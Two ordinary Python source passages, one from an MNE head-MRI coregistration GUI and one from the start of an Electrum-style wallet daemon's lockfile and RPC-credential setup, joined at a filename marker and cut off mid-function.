Item('trans_y_dec', width=-50),
Item('trans_y_inc', width=-50),
Label('(Step)', width=+50),
Item('trans_z', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis", width=+50),
Item('trans_z_dec', width=-50),
Item('trans_z_inc', width=-50),
show_labels=False, show_border=True,
label='Translation', columns=4),
VGrid(Item('rot_x', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"right-left axis", width=+50),
Item('rot_x_dec', width=-50),
Item('rot_x_inc', width=-50),
Item('rot_step', tooltip="Rotation step",
width=+50),
Item('rot_y', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis", width=+50),
Item('rot_y_dec', width=-50),
Item('rot_y_inc', width=-50),
Label('(Step)', width=+50),
Item('rot_z', editor=laggy_float_editor,
show_label=True, tooltip="Rotate along "
"anterior-posterior axis", width=+50),
Item('rot_z_dec', width=-50),
Item('rot_z_inc', width=-50),
show_labels=False, show_border=True,
label='Rotation', columns=4),
# buttons
HGroup(Item('fit_hsp_points',
enabled_when='has_pts_data',
tooltip="Rotate the head shape (around the "
"nasion) so as to minimize the distance "
"from each head shape point to its closest "
"MRI point", width=10),
Item('fit_ap', enabled_when='has_fid_data',
tooltip="Try to match the LPA and the RPA, "
"leaving the Nasion in place", width=10),
Item('fit_fid', enabled_when='has_fid_data',
tooltip="Move and rotate the head shape so "
"as to minimize the distance between the "
"MRI and head shape fiducials", width=10),
show_labels=False),
HGroup(Item('load_trans', width=10),
Spring(), show_labels=False),
'_',
Item('fid_eval_str', style='readonly'),
Item('points_eval_str', style='readonly'),
'_',
VGroup(
Item('scale_labels',
label="Scale *.label files",
enabled_when='n_scale_params > 0'),
Item('copy_annot',
label="Copy annotation files",
enabled_when='n_scale_params > 0'),
Item('prepare_bem_model',
label="Run mne_prepare_bem_model",
enabled_when='can_prepare_bem_model'),
show_left=False,
label='Scaling options',
show_border=True),
'_',
HGroup(Item('save', enabled_when='can_save',
tooltip="Save the trans file and (if "
"scaling is enabled) the scaled MRI"),
Item('reset_params', tooltip="Reset all "
"coregistration parameters"),
show_labels=False),
Item('queue_feedback', style='readonly'),
Item('queue_current', style='readonly'),
Item('queue_len_str', style='readonly'),
show_labels=False),
kind='panel', buttons=[UndoButton], scrollable=scrollable)
return view
class CoregPanel(HasPrivateTraits):
"""Coregistration panel for Head<->MRI with scaling."""
model = Instance(CoregModel)
# parameters
reset_params = Button(label='Reset')
grow_hair = DelegatesTo('model')
n_scale_params = DelegatesTo('model')
scale_step = Float(0.01)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(0.01)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(0.001)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_fid_data = DelegatesTo('model')
has_pts_data = DelegatesTo('model')
has_eeg_data = DelegatesTo('model')
# fitting with scaling
fits_hsp_points = Button(label='Fit Head Shape')
fits_fid = Button(label='Fit Fiducials')
fits_ap = Button(label='Fit LPA/RPA')
# fitting without scaling
fit_hsp_points = Button(label='Fit Head Shape')
fit_fid = Button(label='Fit Fiducials')
fit_ap = Button(label='Fit LPA/RPA')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_prepare_bem_model = DelegatesTo('model')
can_save = DelegatesTo('model')
scale_labels = DelegatesTo('model')
copy_annot = DelegatesTo('model')
prepare_bem_model = DelegatesTo('model')
save = Button(label="Save As...")
load_trans = Button(label='Load trans...')
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
view = _make_view_coreg_panel()
def __init__(self, *args, **kwargs): # noqa: D102
super(CoregPanel, self).__init__(*args, **kwargs)
# Setup scaling worker
def worker():
while True:
(subjects_dir, subject_from, subject_to, scale, skip_fiducials,
include_labels, include_annot, bem_names) = self.queue.get()
self.queue_len -= 1
# Scale MRI files
self.queue_current = 'Scaling %s...' % subject_to
try:
scale_mri(subject_from, subject_to, scale, True,
subjects_dir, skip_fiducials, include_labels,
include_annot)
                except Exception:
logger.error('Error scaling %s:\n' % subject_to +
traceback.format_exc())
self.queue_feedback = ('Error scaling %s (see Terminal)' %
subject_to)
bem_names = () # skip bem solutions
else:
self.queue_feedback = 'Done scaling %s.' % subject_to
# Precompute BEM solutions
for bem_name in bem_names:
self.queue_current = ('Computing %s solution...' %
bem_name)
try:
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to,
name=bem_name)
bemsol = make_bem_solution(bem_file)
write_bem_solution(bem_file[:-4] + '-sol.fif', bemsol)
                    except Exception:
logger.error('Error computing %s solution:\n' %
bem_name + traceback.format_exc())
self.queue_feedback = ('Error computing %s solution '
'(see Terminal)' % bem_name)
else:
self.queue_feedback = ('Done computing %s solution.' %
bem_name)
# Finalize
self.queue_current = ''
self.queue.task_done()
t = Thread(target=worker)
t.daemon = True
t.start()
@cached_property
def _get_queue_len_str(self):
if self.queue_len:
return "Queue length: %i" % self.queue_len
else:
return ''
@cached_property
def _get_rotation(self):
rot = np.array([self.rot_x, self.rot_y, self.rot_z])
return rot
@cached_property
def _get_src_pts(self):
return self.hsp_pts - self.hsp_fid[0]
@cached_property
def _get_src_fid(self):
return self.hsp_fid - self.hsp_fid[0]
@cached_property
def _get_tgt_origin(self):
return self.mri_fid[0] * self.scale
@cached_property
def _get_tgt_pts(self):
pts = self.mri_pts * self.scale
pts -= self.tgt_origin
return pts
@cached_property
def _get_tgt_fid(self):
fid = self.mri_fid * self.scale
fid -= self.tgt_origin
return fid
@cached_property
def _get_translation(self):
trans = np.array([self.trans_x, self.trans_y, self.trans_z])
return trans
def _fit_ap_fired(self):
GUI.set_busy()
self.model.fit_auricular_points()
GUI.set_busy(False)
def _fit_fid_fired(self):
GUI.set_busy()
self.model.fit_fiducials()
GUI.set_busy(False)
def _fit_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_hsp_points()
GUI.set_busy(False)
def _fits_ap_fired(self):
GUI.set_busy()
self.model.fit_scale_auricular_points()
GUI.set_busy(False)
def _fits_fid_fired(self):
GUI.set_busy()
self.model.fit_scale_fiducials()
GUI.set_busy(False)
def _fits_hsp_points_fired(self):
GUI.set_busy()
self.model.fit_scale_hsp_points()
GUI.set_busy(False)
def _reset_params_fired(self):
self.model.reset()
def _rot_x_dec_fired(self):
self.rot_x -= self.rot_step
def _rot_x_inc_fired(self):
self.rot_x += self.rot_step
def _rot_y_dec_fired(self):
self.rot_y -= self.rot_step
def _rot_y_inc_fired(self):
self.rot_y += self.rot_step
def _rot_z_dec_fired(self):
self.rot_z -= self.rot_step
def _rot_z_inc_fired(self):
self.rot_z += self.rot_step
def _load_trans_fired(self):
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
subject = self.model.mri.subject
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject)
dlg = FileDialog(action="open", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
try:
self.model.load_trans(trans_file)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans_file, e), "Error Loading Trans File")
raise
def _save_fired(self):
subjects_dir = self.model.mri.subjects_dir
subject_from = self.model.mri.subject
# check that fiducials are saved
skip_fiducials = False
if self.n_scale_params and not _find_fiducials_files(subject_from,
subjects_dir):
msg = ("No fiducials file has been found for {src}. If fiducials "
"are not saved, they will not be available in the scaled "
"MRI. Should the current fiducials be saved now? "
"Select Yes to save the fiducials at "
"{src}/bem/{src}-fiducials.fif. "
"Select No to proceed scaling the MRI without fiducials.".
format(src=subject_from))
title = "Save Fiducials for %s?" % subject_from
rc = confirm(None, msg, title, cancel=True, default=CANCEL)
if rc == CANCEL:
return
elif rc == YES:
self.model.mri.save(self.model.mri.default_fid_fname)
elif rc == NO:
skip_fiducials = True
else:
raise RuntimeError("rc=%s" % repr(rc))
# find target subject
if self.n_scale_params:
subject_to = self.model.raw_subject or subject_from
mridlg = NewMriDialog(subjects_dir=subjects_dir,
subject_from=subject_from,
subject_to=subject_to)
ui = mridlg.edit_traits(kind='modal')
if not ui.result: # i.e., user pressed cancel
return
subject_to = mridlg.subject_to
else:
subject_to = subject_from
# find trans file destination
raw_dir = os.path.dirname(self.model.hsp.file)
trans_file = trans_fname.format(raw_dir=raw_dir, subject=subject_to)
dlg = FileDialog(action="save as", wildcard=trans_wildcard,
default_path=trans_file)
dlg.open()
if dlg.return_code != OK:
return
trans_file = dlg.path
if not trans_file.endswith('.fif'):
trans_file += '.fif'
if os.path.exists(trans_file):
            answer = confirm(None, "The file %r already exists. Should it "
                             "be replaced?" % trans_file, "Overwrite File?")
if answer != YES:
return
# save the trans file
try:
self.model.save_trans(trans_file)
except Exception as e:
error(None, "Error saving -trans.fif file: %s (See terminal for "
"details)" % (e,), "Error Saving Trans File")
raise
# save the scaled MRI
if self.n_scale_params:
job = self.model.get_scaling_job(subject_to, skip_fiducials)
self.queue.put(job)
self.queue_len += 1
def _scale_x_dec_fired(self):
self.scale_x -= self.scale_step
def _scale_x_inc_fired(self):
self.scale_x += self.scale_step
def _scale_y_dec_fired(self):
self.scale_y -= self.scale_step
def _scale_y_inc_fired(self):
self.scale_y += self.scale_step
def _scale_z_dec_fired(self):
self.scale_z -= self.scale_step
def _scale_z_inc_fired(self):
self.scale_z += self.scale_step
def _trans_x_dec_fired(self):
self.trans_x -= self.trans_step
def _trans_x_inc_fired(self):
self.trans_x += self.trans_step
def _trans_y_dec_fired(self):
self.trans_y -= self.trans_step
def _trans_y_inc_fired(self):
self.trans_y += self.trans_step
def _trans_z_dec_fired(self):
self.trans_z -= self.trans_step
def _trans_z_inc_fired(self):
self.trans_z += self.trans_step
class NewMriDialog(HasPrivateTraits):
"""New MRI dialog."""
# Dialog to determine target subject name for a scaled MRI
subjects_dir = Directory
subject_to = Str
subject_from = Str
subject_to_dir = Property(depends_on=['subjects_dir', 'subject_to'])
subject_to_exists = Property(Bool, depends_on='subject_to_dir')
feedback = Str(' ' * 100)
can_overwrite = Bool
overwrite = Bool
can_save = Bool
view = View(Item('subject_to', label='New MRI Subject Name', tooltip="A "
"new folder with this name will be created in the "
"current subjects_dir for the scaled MRI files"),
Item('feedback', show_label=False, style='readonly'),
Item('overwrite', enabled_when='can_overwrite', tooltip="If a "
"subject with the chosen name exists, delete the old "
"subject"),
buttons=[CancelButton,
Action(name='OK', enabled_when='can_save')])
def _can_overwrite_changed(self, new):
if not new:
self.overwrite = False
@cached_property
def _get_subject_to_dir(self):
return os.path.join(self.subjects_dir, self.subject_to)
@cached_property
def _get_subject_to_exists(self):
if not self.subject_to:
return False
elif os.path.exists(self.subject_to_dir):
return True
else:
return False
@on_trait_change('subject_to_dir,overwrite')
def update_dialog(self):
if not self.subject_from:
# weird trait state that occurs even when subject_from is set
return
elif not self.subject_to:
self.feedback = "No subject specified..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to == self.subject_from:
self.feedback = "Must be different from MRI source subject..."
self.can_save = False
self.can_overwrite = False
elif self.subject_to_exists:
if self.overwrite:
self.feedback = "%s will be overwritten." % self.subject_to
self.can_save = True
self.can_overwrite = True
else:
self.feedback = "Subject already exists..."
self.can_save = False
self.can_overwrite = True
else:
self.feedback = "Name ok."
self.can_save = True
self.can_overwrite = False
def _make_view(tabbed=False, split=False, scene_width=500, scene_height=400,
scrollable=True):
"""Create a view for the CoregFrame.
Parameters
----------
tabbed : bool
Combine the data source panel and the coregistration panel into a
single panel with tabs.
split : bool
Split the main panels with a movable splitter (good for QT4 but
unnecessary for wx backend).
    scene_width : int
        Specify a minimum width for the 3d scene (in pixels).
    scene_height : int
        Specify a minimum height for the 3d scene (in pixels).
    scrollable : bool
        Make the coregistration panel vertically scrollable (default True).
Returns
-------
view : traits View
View object for the CoregFrame.
"""
scene = VGroup(
Item('scene', show_label=False,
editor=SceneEditor(scene_class=MayaviScene),
dock='vertical', width=scene_width, height=scene_height),
VGroup(
Item('headview', style='custom'),
'view_options',
show_border=True, show_labels=False, label='View'))
data_panel = VGroup(
VGroup(Item('subject_panel', style='custom'), label="MRI Subject",
show_border=True, show_labels=False),
VGroup(Item('lock_fiducials', style='custom',
editor=EnumEditor(cols=2, values={False: '2:Edit',
True: '1:Lock'}),
enabled_when='fid_ok'),
HGroup('hsp_always_visible',
Label("Always Show Head Shape Points"),
show_labels=False),
Item('fid_panel', style='custom'),
label="MRI Fiducials", show_border=True, show_labels=False),
VGroup(Item('raw_src', style="custom"),
HGroup('guess_mri_subject',
Label('Guess MRI Subject from File Name'),
show_labels=False),
HGroup(Item('distance', show_label=False, width=20),
'omit_points', 'reset_omit_points', show_labels=False),
Item('omitted_info', style='readonly', show_label=False),
label='Head Shape Source (Raw/Epochs/Evoked/DigMontage)',
show_border=True, show_labels=False),
show_labels=False, label="Data Source")
# Setting `scrollable=True` for a Group does not seem to have any effect
# (macOS), in order to be effective the parameter has to be set for a View
# object; hence we use a special InstanceEditor to set the parameter
# programmatically:
coreg_panel = VGroup(
# width=410 is optimized for macOS to avoid a horizontal scroll-bar;
# might benefit from platform-specific values
Item('coreg_panel', style='custom', width=410 if scrollable else 1,
editor=InstanceEditor(view=_make_view_coreg_panel(scrollable))),
label="Coregistration", show_border=not scrollable, show_labels=False,
enabled_when="fid_panel.locked")
main_layout = 'split' if split else 'normal'
if tabbed:
main = HGroup(scene,
Group(data_panel, coreg_panel, show_labels=False,
layout='tabbed'),
layout=main_layout)
else:
main = HGroup(data_panel, scene, coreg_panel, show_labels=False,
layout=main_layout)
# Here we set the width and height to impossibly small numbers to force the
# window to be as tight as possible
view = View(main, resizable=True, handler=CoregFrameHandler(),
buttons=NoButtons, width=scene_width, height=scene_height)
return view
class ViewOptionsPanel(HasTraits):
"""View options panel."""
mri_obj = Instance(SurfaceObject)
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
view = View(VGroup(Item('mri_obj', style='custom',
label="MRI head"),
Item('hsp_obj', style='custom',
label="Head shape"),
Item('eeg_obj', style='custom',
label='EEG')),
title="View Options")
class CoregFrame(HasTraits):
"""GUI for head-MRI coregistration."""
model = Instance(CoregModel)
scene = Instance(MlabSceneModel, ())
headview = Instance(HeadViewController)
subject_panel = Instance(SubjectSelectorPanel)
fid_panel = Instance(FiducialsPanel)
coreg_panel = Instance(CoregPanel)
view_options_panel = Instance(ViewOptionsPanel)
raw_src = DelegatesTo('model', 'hsp')
guess_mri_subject = DelegatesTo('model')
# Omit Points
distance = Float(5., desc="maximal distance for head shape points from "
"MRI in mm")
omit_points = Button(label='Omit [mm]', desc="to omit head shape points "
"for the purpose of the automatic coregistration "
"procedure.")
reset_omit_points = Button(label='Reset', desc="to reset the "
"omission of head shape points to include all.")
omitted_info = Property(Str, depends_on=['model.hsp.n_omitted'])
fid_ok = DelegatesTo('model', 'mri.fid_ok')
lock_fiducials = DelegatesTo('model')
hsp_always_visible = Bool(False, label="Always Show Head Shape")
title = Str('MNE Coreg')
# visualization
hsp_obj = Instance(PointObject)
eeg_obj = Instance(PointObject)
mri_obj = Instance(SurfaceObject)
lpa_obj = Instance(PointObject)
nasion_obj = Instance(PointObject)
rpa_obj = Instance(PointObject)
hsp_lpa_obj = Instance(PointObject)
hsp_nasion_obj = Instance(PointObject)
hsp_rpa_obj = Instance(PointObject)
hsp_visible = Property(depends_on=['hsp_always_visible', 'lock_fiducials'])
view_options = Button(label="View Options")
picker = Instance(object)
# Processing
queue = DelegatesTo('coreg_panel')
view = _make_view()
def _model_default(self):
return CoregModel(
scale_labels=self._config.get(
'MNE_COREG_SCALE_LABELS', 'true') == 'true',
copy_annot=self._config.get(
'MNE_COREG_COPY_ANNOT', 'true') == 'true',
prepare_bem_model=self._config.get(
'MNE_COREG_PREPARE_BEM', 'true') == 'true')
def _subject_panel_default(self):
return SubjectSelectorPanel(model=self.model.mri.subject_source)
def _fid_panel_default(self):
return FiducialsPanel(model=self.model.mri, headview=self.headview)
def _coreg_panel_default(self):
return CoregPanel(model=self.model)
def _headview_default(self):
return HeadViewController(scene=self.scene, system='RAS')
def __init__(self, raw=None, subject=None, subjects_dir=None,
guess_mri_subject=True, head_opacity=1.,
head_high_res=True, trans=None, config=None): # noqa: D102
self._config = config or {}
super(CoregFrame, self).__init__(guess_mri_subject=guess_mri_subject)
self.subject_panel.model.use_high_res_head = head_high_res
if not 0 <= head_opacity <= 1:
raise ValueError(
"head_opacity needs to be a floating point number between 0 "
"and 1, got %r" % (head_opacity,))
self._initial_head_opacity = head_opacity
if (subjects_dir is not None) and os.path.isdir(subjects_dir):
self.model.mri.subjects_dir = subjects_dir
if raw is not None:
self.model.hsp.file = raw
if subject is not None:
if subject not in self.model.mri.subject_source.subjects:
msg = "%s is not a valid subject. " % subject
# no subjects -> ['']
if any(self.model.mri.subject_source.subjects):
ss = ', '.join(self.model.mri.subject_source.subjects)
msg += ("The following subjects have been found: %s "
"(subjects_dir=%s). " %
(ss, self.model.mri.subjects_dir))
else:
msg += ("No subjects were found in subjects_dir=%s. " %
self.model.mri.subjects_dir)
msg += ("Make sure all MRI subjects have head shape files "
"(run $ mne make_scalp_surfaces).")
raise ValueError(msg)
self.model.mri.subject = subject
if trans is not None:
try:
self.model.load_trans(trans)
except Exception as e:
error(None, "Error loading trans file %s: %s (See terminal "
"for details)" % (trans, e), "Error Loading Trans File")
@on_trait_change('subject_panel.subject')
def _set_title(self):
self.title = '%s - MNE Coreg' % self.model.mri.subject
@on_trait_change('scene.activated')
def _init_plot(self):
_toggle_mlab_render(self, False)
lpa_color = defaults['lpa_color']
nasion_color = defaults['nasion_color']
rpa_color = defaults['rpa_color']
# MRI scalp
color = defaults['head_color']
self.mri_obj = SurfaceObject(points=self.model.transformed_mri_points,
color=color, tri=self.model.mri.tris,
scene=self.scene, name="MRI Scalp",
# opacity=self._initial_head_opacity,
# setting opacity here causes points to be
# [[0, 0, 0]] -- why??
)
self.mri_obj.opacity = self._initial_head_opacity
# on_trait_change was unreliable, so link it another way:
self.model.mri.on_trait_change(self._on_mri_src_change, 'tris')
self.model.sync_trait('transformed_mri_points', self.mri_obj, 'points',
mutual=False)
self.fid_panel.hsp_obj = self.mri_obj
# MRI Fiducials
point_scale = defaults['mri_fid_scale']
self.lpa_obj = PointObject(scene=self.scene, color=lpa_color,
point_scale=point_scale, name='LPA')
self.model.mri.sync_trait('lpa', self.lpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.lpa_obj, 'trans', mutual=False)
self.nasion_obj = PointObject(scene=self.scene, color=nasion_color,
point_scale=point_scale, name='Nasion')
self.model.mri.sync_trait('nasion', self.nasion_obj, 'points',
mutual=False)
self.model.sync_trait('scale', self.nasion_obj, 'trans', mutual=False)
self.rpa_obj = PointObject(scene=self.scene, color=rpa_color,
point_scale=point_scale, name='RPA')
self.model.mri.sync_trait('rpa', self.rpa_obj, 'points', mutual=False)
self.model.sync_trait('scale', self.rpa_obj, 'trans', mutual=False)
# Digitizer Head Shape
color = defaults['extra_color']
point_scale = defaults['extra_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5, name='HSP')
self.hsp_obj = p
self.model.hsp.sync_trait('points', p, mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer EEG
color = defaults['eeg_color']
point_scale = defaults['eeg_scale']
p = PointObject(view='cloud', scene=self.scene, color=color,
point_scale=point_scale, resolution=5, name='EEG')
self.eeg_obj = p
self.model.hsp.sync_trait('eeg_points', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
# Digitizer Fiducials
point_scale = defaults['dig_fid_scale']
opacity = defaults['dig_fid_opacity']
p = PointObject(scene=self.scene, color=lpa_color, opacity=opacity,
point_scale=point_scale, name='HSP-LPA')
self.hsp_lpa_obj = p
self.model.hsp.sync_trait('lpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=nasion_color, opacity=opacity,
point_scale=point_scale, name='HSP-Nasion')
self.hsp_nasion_obj = p
self.model.hsp.sync_trait('nasion', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
p = PointObject(scene=self.scene, color=rpa_color, opacity=opacity,
point_scale=point_scale, name='HSP-RPA')
self.hsp_rpa_obj = p
self.model.hsp.sync_trait('rpa', p, 'points', mutual=False)
self.model.sync_trait('head_mri_trans', p, 'trans', mutual=False)
self.sync_trait('hsp_visible', p, 'visible', mutual=False)
on_pick = self.scene.mayavi_scene.on_mouse_pick
self.picker = on_pick(self.fid_panel._on_pick, type='cell')
self.headview.left = True
_toggle_mlab_render(self, True)
self.scene.render()
self.scene.camera.focal_point = (0., 0., 0.)
self.view_options_panel = ViewOptionsPanel(mri_obj=self.mri_obj,
hsp_obj=self.hsp_obj,
eeg_obj=self.eeg_obj)
@cached_property
def _get_hsp_visible(self):
return self.hsp_always_visible or self.lock_fiducials
@cached_property
def _get_omitted_info(self):
if self.model.hsp.n_omitted == 0:
return "No points omitted"
elif self.model.hsp.n_omitted == 1:
return "1 point omitted"
else:
return "%i points omitted" % self.model.hsp.n_omitted
def _omit_points_fired(self):
distance = self.distance / 1000.
self.model.omit_hsp_points(distance)
def _reset_omit_points_fired(self):
self.model.omit_hsp_points(0, True)
@on_trait_change('model.mri.tris')
def _on_mri_src_change(self):
if self.mri_obj is None:
return
if not (np.any(self.model.mri.points) and np.any(self.model.mri.tris)):
self.mri_obj.clear()
return
self.mri_obj.points = self.model.mri.points
self.mri_obj.tri = self.model.mri.tris
self.mri_obj.plot()
# automatically lock fiducials if a good fiducials file is loaded
@on_trait_change('model.mri.fid_file')
def _on_fid_file_loaded(self):
if self.model.mri.fid_file:
self.fid_panel.locked = True
else:
self.fid_panel.locked = False
def _view_options_fired(self):
self.view_options_panel.edit_traits()
def save_config(self, home_dir=None):
"""Write configuration values."""
set_config('MNE_COREG_GUESS_MRI_SUBJECT',
str(self.model.guess_mri_subject).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_HEAD_HIGH_RES',
str(self.model.mri.use_high_res_head).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_HEAD_OPACITY',
str(self.mri_obj.opacity),
home_dir, set_env=False)
set_config('MNE_COREG_SCALE_LABELS',
str(self.model.scale_labels).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_COPY_ANNOT',
str(self.model.copy_annot).lower(),
home_dir, set_env=False)
set_config('MNE_COREG_PREPARE_BEM',
str(self.model.prepare_bem_model).lower(),
home_dir, set_env=False)
if self.model.mri.subjects_dir:
set_config('MNE_COREG_SUBJECTS_DIR',
self.model.mri.subjects_dir,
home_dir, set_env=False)
|
daemon.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import base64
from typing import Optional, Tuple, Any
import os
import time
import jsonrpclib
from .restapi import AiohttpServer
from .app_state import app_state
from .commands import known_commands, Commands
from .exchange_rate import FxTask
from .jsonrpc import VerifyingJSONRPCServer
from .logs import logs
from .network import Network
from .simple_config import SimpleConfig
from .storage import WalletStorage
from .util import json_decode, DaemonThread, to_string, random_integer, get_wallet_name_from_path
from .version import PACKAGE_VERSION
from .wallet import Wallet
from .restapi_endpoints import DefaultEndpoints
logger = logs.get_logger("daemon")
def get_lockfile(config: SimpleConfig) -> str:
return os.path.join(config.path, 'daemon')
def remove_lockfile(lockfile: str) -> None:
logger.debug("removing lockfile")
try:
os.unlink(lockfile)
except OSError:
pass
def get_fd_or_server(config: SimpleConfig) -> Tuple[Optional[int], Optional[jsonrpclib.Server]]:
    '''Try to create the lockfile, using O_EXCL to prevent races. If
    creation succeeds, return the file descriptor. Otherwise, try to
    connect to the server specified in the lockfile; if that succeeds,
    return the server. Otherwise, remove the lockfile and try again.'''
lockfile = get_lockfile(config)
while True:
try:
return os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644), None
except OSError:
pass
server = get_server(config)
if server is not None:
return None, server
# Couldn't connect; remove lockfile and try again.
remove_lockfile(lockfile)
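# A self-contained sketch of the O_EXCL idiom get_fd_or_server relies on
# (assumed semantics only; this helper is hypothetical and not used
# elsewhere in this module): creation with O_CREAT | O_EXCL is atomic,
# so at most one process ever receives a file descriptor.
def _try_acquire_lockfile(path: str) -> Optional[int]:
    try:
        return os.open(path, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644)
    except OSError:
        return None  # another process already holds (or held) the lock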
def get_server(config: SimpleConfig) -> Optional[jsonrpclib.Server]:
lockfile_path = get_lockfile(config)
while True:
create_time = None
server_url = None
try:
with open(lockfile_path) as f:
(host, port), create_time = ast.literal_eval(f.read())
rpc_user, rpc_password = get_rpc_credentials(config)
if rpc_password == '':
# authentication disabled
server_url = 'http://%s:%d' % (host, port)
else:
server_url = 'http://%s:%s@%s:%d' % (
rpc_user, rpc_password, host, port)
server = jsonrpclib.Server(server_url)
# Test daemon is running
server.ping()
return server
except ConnectionRefusedError:
logger.warning("get_server could not connect to the rpc server, is it running?")
except SyntaxError:
if os.path.getsize(lockfile_path):
logger.exception("RPC server lockfile exists, but is invalid")
else:
# Our caller 'get_fd_or_server' has created the empty file before we check.
logger.warning("get_server could not connect to the rpc server, is it running?")
except FileNotFoundError as e:
if lockfile_path == e.filename:
logger.info("attempt to connect to the RPC server failed")
else:
logger.exception("attempt to connect to the RPC server failed")
except Exception:
logger.exception("attempt to connect to the RPC server failed")
if not create_time or create_time < time.time() - 1.0:
return None
# Sleep a bit and try again; it might have just been started
time.sleep(1.0)
def get_rpc_credentials(config: SimpleConfig, is_restapi=False) \
-> Tuple[Optional[str], Optional[str]]:
rpc_user = config.get('rpcuser', None)
rpc_password = config.get('rpcpassword', None)
if rpc_user is None or rpc_password is None:
rpc_user = 'user'
nbits = 128
pw_int = random_integer(nbits)
pw_b64 = base64.b64encode(
pw_int.to_bytes(nbits // 8, 'big'), b'-_')
rpc_password = to_string(pw_b64, 'ascii')
config.set_key('rpcuser', rpc_user)
config.set_key('rpcpassword', rpc_password, save=True)
    elif rpc_password == '' and not is_restapi:
        logger.warning('No password set for RPC API. Access is therefore granted to all users.')
    elif rpc_password == '' and is_restapi:
        logger.warning('No password set for REST API. Access is therefore granted to all users.')
return rpc_user, rpc_password
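# A standalone sketch of the generated-password scheme above, drawing the
# same 128 bits of entropy from os.urandom instead of the module's
# random_integer helper (hypothetical function, not used by the daemon):
# '-' and '_' replace base64's '+' and '/' so the value is URL- and
# shell-safe.
def _sketch_random_password(nbits: int = 128) -> str:
    return base64.b64encode(os.urandom(nbits // 8), b'-_').decode('ascii')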
class Daemon(DaemonThread):
def __init__(self, fd, is_gui: bool) -> None:
super().__init__('daemon')
app_state.daemon = self
config = app_state.config
self.config = config
if config.get('offline'):
self.network = None
self.fx_task = None
app_state.read_headers()
else:
self.network = Network()
app_state.fx = FxTask(app_state.config, self.network)
self.fx_task = app_state.async_.spawn(app_state.fx.refresh_loop)
self.wallets = {}
# RPC API - (synchronous)
self.init_server(config, fd, is_gui)
# self.init_thread_watcher()
self.is_gui = is_gui
# REST API - (asynchronous)
self.rest_server = None
if app_state.config.get("restapi"):
self.init_restapi_server(config, fd)
self.configure_restapi_server()
def configure_restapi_server(self):
self.default_api = DefaultEndpoints()
self.rest_server.register_routes(self.default_api)
def init_restapi_server(self, config: SimpleConfig, fd) -> None:
host = config.get('rpchost', '127.0.0.1')
restapi_port = int(config.get('restapi_port', 9999))
username, password = get_rpc_credentials(config, is_restapi=True)
self.rest_server = AiohttpServer(host=host, port=restapi_port, username=username,
password=password)
def init_server(self, config: SimpleConfig, fd, is_gui: bool) -> None:
host = config.get('rpchost', '127.0.0.1')
port = config.get('rpcport', 8888)
